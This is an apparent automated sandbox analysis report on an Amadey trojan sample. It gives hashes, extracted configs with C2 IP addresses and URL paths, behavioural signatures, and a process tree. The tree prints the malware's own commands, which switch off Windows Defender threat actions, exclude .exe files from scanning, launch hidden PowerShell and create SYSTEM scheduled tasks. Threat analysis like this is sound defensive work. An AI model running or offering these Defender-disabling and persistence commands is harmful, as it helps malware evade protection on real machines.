Analysis

  • max time kernel
    146s
  • max time network
    152s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240508-en
  • resource tags

    arch:x64arch:x86image:win11-20240508-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    01-06-2024 04:45

General

  • Target

    73cf46ec8be892d9e4227a7302bc7e4b040e5517fe709fec8c3490aac07fccfe.exe

  • Size

    1.8MB

  • MD5

    db449664f4044d5d6094e2f0780f40b8

  • SHA1

    8704bc9afb7a49e6545c9b0080127d3d722306b7

  • SHA256

    73cf46ec8be892d9e4227a7302bc7e4b040e5517fe709fec8c3490aac07fccfe

  • SHA512

    47f59b00d21fc5bb52921f78fb2182c2ad9d48995558c44152bebec3e18d2ac873853fefd20b3b699124ecd34f835acc8baa49906d459568d46290130ab23fde

  • SSDEEP

    49152:CXqQnh78ilf9RTz/Gq2fvTBG5cW7GBz/r9krqLtC7zCDuv:kf9tOvTBgYJksR6

Malware Config

Extracted

Family

amadey

Version

4.21

Botnet

0e6740

C2

http://147.45.47.155

Attributes
  • install_dir

    9217037dc9

  • install_file

    explortu.exe

  • strings_key

    8e894a8a4a3d0da8924003a561cfb244

  • url_paths

    /ku4Nor9/index.php

rc4.plain

Extracted

Family

amadey

Version

4.21

Botnet

49e482

C2

http://147.45.47.70

Attributes
  • install_dir

    1b29d73536

  • install_file

    axplont.exe

  • strings_key

    4d31dd1a190d9879c21fac6d87dc0043

  • url_paths

    /tr8nomy/index.php

rc4.plain

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 9 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

    Run Powershell and hide display window.

  • Downloads MZ/PE file
  • Checks BIOS information in registry 2 TTPs 20 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 18 IoCs
  • Identifies Wine through registry keys 2 TTPs 9 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops Chrome extension 2 IoCs
  • Drops desktop.ini file(s) 1 IoCs
  • Drops file in System32 directory 31 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 9 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Drops file in Program Files directory 14 IoCs
  • Drops file in Windows directory 7 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 3 IoCs
  • Creates scheduled task(s) 1 TTPs 10 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\73cf46ec8be892d9e4227a7302bc7e4b040e5517fe709fec8c3490aac07fccfe.exe
    "C:\Users\Admin\AppData\Local\Temp\73cf46ec8be892d9e4227a7302bc7e4b040e5517fe709fec8c3490aac07fccfe.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Identifies Wine through registry keys
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Drops file in Windows directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:5048
    • C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
      "C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Checks BIOS information in registry
      • Executes dropped EXE
      • Identifies Wine through registry keys
      • Adds Run key to start application
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:3232
      • C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
        "C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe"
        3⤵
          PID:3440
        • C:\Users\Admin\1000004002\ee4c8451e8.exe
          "C:\Users\Admin\1000004002\ee4c8451e8.exe"
          3⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Drops file in Windows directory
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:396
          • C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe
            "C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe"
            4⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:4796
            • C:\Users\Admin\AppData\Local\Temp\1000043001\volumeinfo.exe
              "C:\Users\Admin\AppData\Local\Temp\1000043001\volumeinfo.exe"
              5⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              • Suspicious use of AdjustPrivilegeToken
              PID:3064
              • C:\Users\Admin\AppData\Local\Temp\1000043001\volumeinfo.exe
                "C:\Users\Admin\AppData\Local\Temp\1000043001\volumeinfo.exe"
                6⤵
                • Executes dropped EXE
                • Adds Run key to start application
                PID:1192
            • C:\Users\Admin\AppData\Local\Temp\1000045001\setup.exe
              "C:\Users\Admin\AppData\Local\Temp\1000045001\setup.exe"
              5⤵
              • Executes dropped EXE
              • Suspicious use of WriteProcessMemory
              PID:4448
              • C:\Users\Admin\AppData\Local\Temp\7zSC2E2.tmp\Install.exe
                .\Install.exe
                6⤵
                • Executes dropped EXE
                • Suspicious use of WriteProcessMemory
                PID:3132
                • C:\Users\Admin\AppData\Local\Temp\7zSD1F6.tmp\Install.exe
                  .\Install.exe /igBdidzckQS "385134" /S
                  7⤵
                  • Checks BIOS information in registry
                  • Executes dropped EXE
                  • Enumerates system info in registry
                  • Suspicious use of WriteProcessMemory
                  PID:4520
                  • C:\Windows\SysWOW64\cmd.exe
                    "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                    8⤵
                    • Suspicious use of WriteProcessMemory
                    PID:4672
                    • C:\Windows\SysWOW64\forfiles.exe
                      forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                      9⤵
                      • Suspicious use of WriteProcessMemory
                      PID:408
                      • C:\Windows\SysWOW64\cmd.exe
                        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                        10⤵
                        • Suspicious use of WriteProcessMemory
                        PID:2124
                        • \??\c:\windows\SysWOW64\reg.exe
                          reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                          11⤵
                            PID:2008
                      • C:\Windows\SysWOW64\forfiles.exe
                        forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                        9⤵
                        • Suspicious use of WriteProcessMemory
                        PID:1156
                        • C:\Windows\SysWOW64\cmd.exe
                          /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                          10⤵
                          • Suspicious use of WriteProcessMemory
                          PID:4612
                          • \??\c:\windows\SysWOW64\reg.exe
                            reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                            11⤵
                              PID:1036
                        • C:\Windows\SysWOW64\forfiles.exe
                          forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                          9⤵
                          • Suspicious use of WriteProcessMemory
                          PID:1604
                          • C:\Windows\SysWOW64\cmd.exe
                            /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                            10⤵
                            • Suspicious use of WriteProcessMemory
                            PID:3400
                            • \??\c:\windows\SysWOW64\reg.exe
                              reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                              11⤵
                                PID:4748
                          • C:\Windows\SysWOW64\forfiles.exe
                            forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                            9⤵
                            • Suspicious use of WriteProcessMemory
                            PID:3596
                            • C:\Windows\SysWOW64\cmd.exe
                              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                              10⤵
                                PID:1032
                                • \??\c:\windows\SysWOW64\reg.exe
                                  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                  11⤵
                                    PID:2696
                              • C:\Windows\SysWOW64\forfiles.exe
                                forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                9⤵
                                  PID:1700
                                  • C:\Windows\SysWOW64\cmd.exe
                                    /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                    10⤵
                                      PID:2044
                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                        11⤵
                                        • Command and Scripting Interpreter: PowerShell
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:2776
                                        • C:\Windows\SysWOW64\gpupdate.exe
                                          "C:\Windows\system32\gpupdate.exe" /force
                                          12⤵
                                            PID:484
                                  • C:\Windows\SysWOW64\forfiles.exe
                                    "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
                                    8⤵
                                      PID:5456
                                      • C:\Windows\SysWOW64\cmd.exe
                                        /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                        9⤵
                                          PID:5596
                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                            10⤵
                                            • Command and Scripting Interpreter: PowerShell
                                            • Suspicious behavior: EnumeratesProcesses
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:5644
                                            • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                              "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                              11⤵
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:5720
                                      • C:\Windows\SysWOW64\schtasks.exe
                                        schtasks /CREATE /TN "btZaCbGShXZoJDfvCg" /SC once /ST 04:47:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zSD1F6.tmp\Install.exe\" PP /bBbdidUrxe 385134 /S" /V1 /F
                                        8⤵
                                        • Drops file in Windows directory
                                        • Creates scheduled task(s)
                                        PID:2880
                                      • C:\Windows\SysWOW64\forfiles.exe
                                        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn btZaCbGShXZoJDfvCg"
                                        8⤵
                                          PID:5716
                                          • C:\Windows\SysWOW64\cmd.exe
                                            /C schtasks /run /I /tn btZaCbGShXZoJDfvCg
                                            9⤵
                                              PID:5836
                                              • \??\c:\windows\SysWOW64\schtasks.exe
                                                schtasks /run /I /tn btZaCbGShXZoJDfvCg
                                                10⤵
                                                  PID:5868
                                            • C:\Windows\SysWOW64\WerFault.exe
                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4520 -s 736
                                              8⤵
                                              • Program crash
                                              PID:1252
                                      • C:\Users\Admin\AppData\Local\Temp\1000046001\9a3efc.exe
                                        "C:\Users\Admin\AppData\Local\Temp\1000046001\9a3efc.exe"
                                        5⤵
                                        • Executes dropped EXE
                                        • Suspicious use of SetThreadContext
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:3412
                                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                                          6⤵
                                            PID:5444
                                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                                            6⤵
                                            • Suspicious use of SetThreadContext
                                            • Suspicious behavior: EnumeratesProcesses
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:5968
                                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                              7⤵
                                                PID:5980
                                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                                              6⤵
                                              • Drops file in Windows directory
                                              PID:3192
                                              • C:\Users\Admin\AppData\Local\Temp\b9695770f1\Dctooux.exe
                                                "C:\Users\Admin\AppData\Local\Temp\b9695770f1\Dctooux.exe"
                                                7⤵
                                                • Executes dropped EXE
                                                PID:4688
                                      • C:\Users\Admin\AppData\Local\Temp\1000005001\9758585e6f.exe
                                        "C:\Users\Admin\AppData\Local\Temp\1000005001\9758585e6f.exe"
                                        3⤵
                                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                        • Checks BIOS information in registry
                                        • Executes dropped EXE
                                        • Identifies Wine through registry keys
                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                        • Suspicious behavior: EnumeratesProcesses
                                        PID:1844
                                  • C:\Users\Admin\AppData\Local\Temp\7zSD1F6.tmp\Install.exe
                                    C:\Users\Admin\AppData\Local\Temp\7zSD1F6.tmp\Install.exe PP /bBbdidUrxe 385134 /S
                                    1⤵
                                    • Executes dropped EXE
                                    • Drops desktop.ini file(s)
                                    • Drops file in System32 directory
                                    • Modifies data under HKEY_USERS
                                    PID:5900
                                    • C:\Windows\SysWOW64\cmd.exe
                                      "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                      2⤵
                                        PID:6076
                                        • C:\Windows\SysWOW64\forfiles.exe
                                          forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                          3⤵
                                            PID:2128
                                            • C:\Windows\SysWOW64\cmd.exe
                                              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                              4⤵
                                                PID:1376
                                                • \??\c:\windows\SysWOW64\reg.exe
                                                  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                  5⤵
                                                    PID:4872
                                              • C:\Windows\SysWOW64\forfiles.exe
                                                forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                                3⤵
                                                  PID:2864
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                    4⤵
                                                      PID:2984
                                                      • \??\c:\windows\SysWOW64\reg.exe
                                                        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                        5⤵
                                                          PID:5128
                                                    • C:\Windows\SysWOW64\forfiles.exe
                                                      forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                                      3⤵
                                                        PID:5180
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                          4⤵
                                                            PID:1780
                                                            • \??\c:\windows\SysWOW64\reg.exe
                                                              reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                              5⤵
                                                                PID:4140
                                                          • C:\Windows\SysWOW64\forfiles.exe
                                                            forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                                            3⤵
                                                              PID:4632
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                4⤵
                                                                  PID:1220
                                                                  • \??\c:\windows\SysWOW64\reg.exe
                                                                    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                    5⤵
                                                                      PID:3624
                                                                • C:\Windows\SysWOW64\forfiles.exe
                                                                  forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                  3⤵
                                                                    PID:1092
                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                      /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                      4⤵
                                                                        PID:1216
                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                          5⤵
                                                                          • Command and Scripting Interpreter: PowerShell
                                                                          • Drops file in System32 directory
                                                                          • Modifies data under HKEY_USERS
                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                          PID:2180
                                                                          • C:\Windows\SysWOW64\gpupdate.exe
                                                                            "C:\Windows\system32\gpupdate.exe" /force
                                                                            6⤵
                                                                              PID:4808
                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
                                                                      2⤵
                                                                      • Drops file in System32 directory
                                                                      • Modifies data under HKEY_USERS
                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      PID:756
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                                                                        3⤵
                                                                          PID:1008
                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                            REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                                                                            4⤵
                                                                              PID:5088
                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
                                                                            3⤵
                                                                              PID:1160
                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
                                                                              3⤵
                                                                                PID:4412
                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
                                                                                3⤵
                                                                                  PID:3364
                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
                                                                                  3⤵
                                                                                    PID:2844
                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
                                                                                    3⤵
                                                                                      PID:4492
                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
                                                                                      3⤵
                                                                                        PID:1496
                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
                                                                                        3⤵
                                                                                          PID:5216
